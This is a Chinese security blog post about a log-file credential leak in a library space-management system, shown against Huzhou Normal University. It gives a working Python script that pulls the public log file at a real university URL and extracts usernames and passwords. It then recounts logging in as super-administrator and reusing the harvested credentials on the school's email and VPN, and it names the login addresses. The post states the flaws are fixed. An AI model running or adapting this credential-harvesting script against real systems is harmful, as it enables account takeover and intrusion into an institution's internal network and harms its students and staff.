当前位置:首页 > DayDayUp > 正文内容

IC空间管理系统通用日志泄露漏洞--以湖州师范学院为例

Luz10个月前 (10-16)DayDayUp1532

文中涉及到的漏洞均已修复

image.png

访问日志文件,可以看到用户登录时产生的日志文件和密码

 

以下是用户名密码获取脚本(python)

#coding:utf-8
import requests
import re
tex=requests.get('http://icspace.lib.zjhu.edu.cn/Log/log.txt').text
#print(tex)
kk = re.compile(r'user:.*')
resu=re.findall(kk,str(tex))
quchong=list(set(resu))
#print(quchong)
a=[]
for i in quchong:
    a.append(i[5:-1].split('/'))
print(a)

 

image.png

获取到的部分密码

账号:staadmin001 为最高权限管理员账号

登录地址:http://icspace.lib.zjhu.edu.cn/pages/ic/LoginForm.aspx

 

 

image.png

权限为超级管理员

 

尝试00174 可以进入校园邮箱

登录地址:http://mail.zjhu.edu.cn/


 

 

 

可以登录学校内网

VPN登录地址:https://vpn.zjhu.edu.cn/

访问学校内网所有资源


 

这仅为一个账号的测试,这里拿到的90%的学生用户的账户密码均可进入内网

50%的教师用户账户密码可以登录邮箱与内网


相关文章

AWD赛后总结与反思

AWD赛后总结与反思

大概有半年多没有打过网络安全的竞赛了,最近被拉去打了国赛,当然是纯被打的角色,从前打的都是CTF,AWD的赛制、规则、注意点都与之有天壤之别。不出意料没拿到什么奖,总结了一下国赛AWD的经验,自己还是小白,所以请大佬绕道。一、赛前查的资料赛...

删除Halo桌面卸载后残余的halodesktop文件夹

删除Halo桌面卸载后残余的halodesktop文件夹

现象:残留Halo桌面写在后在 C:\Program Files (x86) 残留目录HaloDesktop其中存在HaloSvc.dll文件被Desktop Arrangement Helper Service使用,导致整个文件夹无法删除...

Activemq端口放行(activemq报错Transport Connection to: tcp://XXX failed: java.io.EOFExcepti)

Activemq端口放行(activemq报错Transport Connection to: tcp://XXX failed: java.io.EOFExcepti)

发现有的activemq部署后局域网内其他机子连接日志报错为2021-08-06 16:21:49,499 | WARN  | Transport Connection&...

redis未授权访问漏洞复现

redis未授权访问漏洞复现

环境搭建靶机:wget http://download.redis.io/releases/redis-2.8.17.tar.gz  //服务下载 tar xzfredis-2.8.17.tar.g...

Microsoft Compatibility Telemetry进程关闭

Microsoft Compatibility Telemetry进程关闭

没什么用的进程,主要负责向微软传送系用户数据并占用大量系统资源。关闭方法打开任务计划程序在  任务计划程序库--Microsoft--Windows--Application Experience中禁用即可...

b站批量取消关注

console代码:$(".be-pager-next:contains('下一页')").click();$(".be-dropdown-item:contains('取消关注'...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。